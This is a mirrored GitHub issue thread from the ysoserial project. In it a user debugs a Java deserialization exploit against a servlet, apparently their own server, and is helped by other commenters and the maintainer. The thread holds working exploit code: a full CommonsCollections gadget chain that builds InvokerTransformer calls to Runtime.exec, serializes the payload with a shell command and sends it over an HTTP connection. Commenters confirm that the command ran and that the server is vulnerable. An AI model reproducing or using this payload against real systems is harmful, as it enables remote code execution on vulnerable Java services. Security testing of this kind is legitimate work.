Giter VIP home page Giter VIP logo

Comments (11)

ercano avatar ercano commented on July 2, 2024

Seems that you created the payload with another jvm that the target runs with. try the same jvm version

from ysoserial.

ercano avatar ercano commented on July 2, 2024

works. the jvm version did'nt make any difference to generated payload.

from ysoserial.

vektory79 avatar vektory79 commented on July 2, 2024

Same problem. Despite that I serialize and deserialize object in one go.

Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
    at com.sun.proxy.$Proxy0.entrySet(Unknown Source)
    at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:444)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
    at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
    at ru.krista.exploid.Exploid1.deserialize(Exploid1.java:113)
    at ru.krista.exploid.Exploid1.send(Exploid1.java:75)
    at ru.krista.exploid.Exploid1.main(Exploid1.java:30)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at com.intellij.rt.execution.application.AppMain.main(AppMain.java:144)

from ysoserial.

ercano avatar ercano commented on July 2, 2024

What Command did you execute with payload?

from ysoserial.

vektory79 avatar vektory79 commented on July 2, 2024

I write just a small main method with some helpers:

        ByteArrayOutputStream byteOutputStream = new ByteArrayOutputStream();
        //serialize(byteOutputStream, request);
        serialize(byteOutputStream, getObject("echo You are hacked!!! > /media/data/hacked.txt"));
        servletConnection.setFixedLengthStreamingMode(byteOutputStream.size());
        OutputStream out = servletConnection.getOutputStream();

        byteOutputStream.writeTo(out);
        out.flush();

        Object test = deserialize(new ByteArrayInputStream(byteOutputStream.toByteArray())); // BANG! Exception here
...

    /**
     * Сериализация и передача пакета
     * @param out выходной поток
     * @param packetInfo информационный пакет
     */
    public static void serialize(OutputStream out, Object packetInfo) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(out)) {
            oos.writeObject(packetInfo);
            oos.flush();
        }
    }

    /**
     * Десериализация и получение пакета
     * @param in входящий поток
     * @return результирующее значение пакета
     */
    public static Object deserialize(InputStream in) throws IOException {
        Object result = null;
        try (ObjectInputStream oin = new ObjectInputStream(in)) {
            try {
                result = oin.readObject();
            } catch (ClassNotFoundException ex) {
                // ничего не делаем
            }
            oin.close();
        }
        return result;
    }

    public static Object getObject(final String command) throws Exception {
        final String[] execArgs = new String[] { command };
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, execArgs),
                new ConstantTransformer(1) };
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
        final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
        return handler;
    }

I think, that miss something, but don't know what exactly.

from ysoserial.

ercano avatar ercano commented on July 2, 2024

What ist your testing platform (win,linux,mac,?)

from ysoserial.

vektory79 avatar vektory79 commented on July 2, 2024

Than you for quick answers.

My system is Ubuntu 14.04 amd64

Java version:
java version "1.8.0_66"
Java(TM) SE Runtime Environment (build 1.8.0_66-b17)
Java HotSpot(TM) 64-Bit Server VM (build 25.66-b17, mixed mode)

from ysoserial.

ercano avatar ercano commented on July 2, 2024

Did you checked /media/data/hacked.txt
i did "touch /tmp/hacked" also got execption, but file was sucessfully created

from ysoserial.

vektory79 avatar vektory79 commented on July 2, 2024

Thank you! It's just problem with "echo" command. :-)

And our server is vulnerable :-(

Thank you, again.

from ysoserial.

ercano avatar ercano commented on July 2, 2024

your welcome

from ysoserial.

frohoff avatar frohoff commented on July 2, 2024

ClassCastException is expected in most cases but by that point the payload should have already executed. Closing.

from ysoserial.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.